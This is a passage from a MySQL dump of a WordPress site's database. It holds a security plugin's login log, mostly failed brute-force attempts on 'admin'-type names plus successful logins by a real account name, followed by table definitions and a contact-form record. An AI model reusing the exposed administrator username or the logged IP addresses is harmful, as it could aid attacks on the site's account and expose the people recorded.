Safari/537.36'),(19847,131692,1699346725.533286,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA2F0114D,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(19845,131691,1699346461.003208,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19846,131691,1699346461.005763,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19844,131683,1699345804.235588,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19843,131682,1699345140.810260,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19842,131681,1699344762.575395,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF0509EE74,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19840,131679,1699344472.258424,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19841,131680,1699344607.774413,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9DF5CA08,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(19839,131679,1699344472.255877,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19838,131678,1699344162.605282,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF2D3DBC2A,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),(19836,131676,1699343167.155851,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19837,131677,1699343813.870821,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19835,131676,1699343167.153328,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19834,131675,1699342517.585259,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19833,131674,1699342482.733148,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB8A87C2B,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19831,131673,1699341863.626137,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19832,131674,1699342482.730108,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB8A87C2B,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19830,131672,1699341206.959924,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19829,131671,1699340559.279179,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19828,131670,1699340488.497687,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23DB42B7,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(19827,131669,1699340324.728482,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF877D0109,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(19826,131668,1699340321.792592,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC02ED0D4,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19825,131667,1699339920.226752,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19823,131664,1699338641.251992,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19824,131666,1699339282.017783,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19691,131270,1699139787.370780,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19692,131271,1699140583.607452,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19693,131272,1699141131.438316,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19694,131273,1699141153.474347,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19695,131274,1699141381.323213,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19696,131275,1699142172.948127,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19697,131276,1699142977.673981,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19698,131286,1699143573.353583,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19699,131287,1699143784.219348,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19700,131288,1699144584.285189,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19701,131289,1699145380.224542,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19702,131290,1699145957.627502,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19703,131291,1699146176.270828,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19704,131292,1699146973.001785,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19705,131293,1699147775.509184,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19706,131294,1699147880.286214,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFF6BBD0BD7,'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(19707,131295,1699148384.492371,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19708,131296,1699150822.233852,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19709,131296,1699150822.236498,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19710,131299,1699152689.181256,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19711,131301,1699153300.365425,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19712,131312,1699155763.892114,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19713,131315,1699158216.942915,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19714,131317,1699160670.616416,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19715,131318,1699163149.645244,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19716,131324,1699165567.571122,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19717,131327,1699167983.393662,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19718,131337,1699170352.987854,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19719,131338,1699172736.025536,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19720,131339,1699175122.159574,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19721,131343,1699177499.037069,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19722,131344,1699179880.846452,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19723,131419,1699182279.316951,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19724,131420,1699184396.916838,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF25BB872D,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(19725,131421,1699184643.709672,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19726,131430,1699187026.801706,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19727,131431,1699187169.250383,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36259CF0,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(19728,131438,1699189375.811414,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19729,131449,1699191483.365885,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF92BE47E8,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19730,131458,1699191761.014966,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19731,131520,1699194141.543225,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19732,131521,1699194306.786211,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFFD46E5C9B,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(19733,131522,1699196527.903094,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19734,131523,1699198899.793376,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19735,131524,1699199405.527932,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFFA763581C,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(19736,131524,1699199405.530479,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFFA763581C,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(19888,131734,1699361888.386108,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF4E8ED343,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(19889,131735,1699362051.029802,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF2D54E206,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(19890,131736,1699364063.232044,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF8B3BA6E9,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(19891,131736,1699364063.234584,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF8B3BA6E9,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(19892,131737,1699364219.899044,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF5CCDB899,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19893,131737,1699364219.904425,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF5CCDB899,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19894,131748,1699367819.935899,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34902DCB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19895,131749,1699367825.846850,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34902DCB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19896,131754,1699373065.917329,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19971,133732,1699921394.715059,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23EC0652,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19972,133733,1699921394.972202,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23EC0652,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19973,134083,1699936285.710541,1,'loginFailInvalidUsername','wordcamp',0,0x00000000000000000000FFFFC20ED93F,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19974,134084,1699936697.560007,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E012B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19975,134085,1699936697.827727,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E012B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19976,134086,1699936698.011720,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF225E012B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19984,134342,1700071298.346625,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19985,134343,1700071337.107072,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0'),(19986,134344,1700071403.910709,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0'),(19987,134345,1700071542.951959,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19988,134346,1700072661.811646,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19989,134348,1700081246.438723,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF226A61DA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19990,134349,1700081246.813918,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF226A61DA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19991,134350,1700081247.183213,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF226A61DA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19992,134377,1700098647.517976,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67B0A7C0,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(19993,134377,1700098647.521782,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67B0A7C0,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(19994,134378,1700104750.433615,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF6BBD073A,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(19995,134382,1700119335.682490,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7AAD1F4F,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(19996,134382,1700119335.686257,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7AAD1F4F,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(19997,134383,1700119445.923481,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14C1E801,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19998,134386,1700126748.907917,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFCDB97ED6,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19999,134387,1700130403.366196,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20000,134388,1700130983.987326,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20001,134389,1700131589.045987,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20002,134390,1700132214.778012,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20003,134391,1700132855.112315,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20004,134391,1700132855.115349,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20005,134415,1700133509.786506,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20006,134416,1700134158.470357,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20007,134417,1700134809.564433,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20008,134420,1700135457.264208,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20009,134421,1700136086.371817,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20010,134432,1700136714.598581,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20011,134432,1700136714.601567,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20012,134433,1700137353.263775,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20013,134434,1700137995.414920,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20014,134438,1700138654.349493,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20015,134439,1700139322.715090,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20016,134441,1700139993.932015,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20017,134444,1700140663.563149,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20018,134445,1700141349.711826,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20019,134446,1700142029.784711,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20020,134448,1700142675.465357,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20021,134451,1700143326.046109,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20022,134453,1700143985.068603,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20023,134454,1700144651.035984,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20024,134457,1700145322.010848,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20025,134458,1700145985.307066,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20026,134459,1700146645.353418,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20027,134577,1700146994.388167,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC221BF87,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(20028,134620,1700147303.109685,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20029,134621,1700147952.168951,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20030,134622,1700148596.314608,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20031,134623,1700149246.712338,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20032,134624,1700149576.402731,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB142814B,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(20033,134625,1700149918.819894,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0'),(20034,134626,1700150596.228685,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D836CA4,'Mozilla/5.0');
/*!40000 ALTER TABLE `wpcl_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wflogins` with 2003 row(s)
--

--
-- Table structure for table `wpcl_wpgmza_rectangles`
--

DROP TABLE IF EXISTS `wpcl_wpgmza_rectangles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpgmza_rectangles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `map_id` int(11) NOT NULL,
  `name` text DEFAULT NULL,
  `cornerA` point DEFAULT NULL,
  `cornerB` point DEFAULT NULL,
  `color` varchar(16) DEFAULT NULL,
  `opacity` float DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpgmza_rectangles`
--

LOCK TABLES `wpcl_wpgmza_rectangles` WRITE;
/*!40000 ALTER TABLE `wpcl_wpgmza_rectangles` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpgmza_rectangles` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpgmza_rectangles` with 0 row(s)
--

--
-- Table structure for table `wpcl_posts`
--

DROP TABLE IF EXISTS `wpcl_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=269418 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_posts`
--

LOCK TABLES `wpcl_posts` WRITE;
/*!40000 ALTER TABLE `wpcl_posts` DISABLE KEYS */;
INSERT INTO `wpcl_posts` VALUES (6,2,'2019-07-03 16:15:27','2019-07-03 16:15:27','{\"id\":6,\"field_id\":4,\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"BoldGrid Form 1\",\"form_desc\":\"\",\"hide_title_desc\":\"1\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"Form 1 submission\",\"sender_name\":\"\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmation_type\":\"message\",\"confirmation_message\":\"<span id=u0022nf-drawer-contentu0022><span class=u0022nf-setting-groupsu0022><span class=u0022nf-field-settingsu0022>Thank you for getting in touch with us! We will try our best to respond back to you within 24 hours.</span></span></span>\",\"confirmation_message_scroll\":\"1\",\"confirmation_page\":\"72532\",\"confirmation_redirect\":\"\"},\"meta\":{\"template\":\"blank\"}}','BoldGrid Form 1','','publish','closed','closed','','boldgrid-form-1','','','2019-07-03 16:15:27','2019-07-03 16:15:27','',0,'https://eckankar-colorado.org/?post_type=wpforms&#038;p=6',0,'wpforms','',0),(7,2,'2019-07-03 16:15:27','2019-07-03 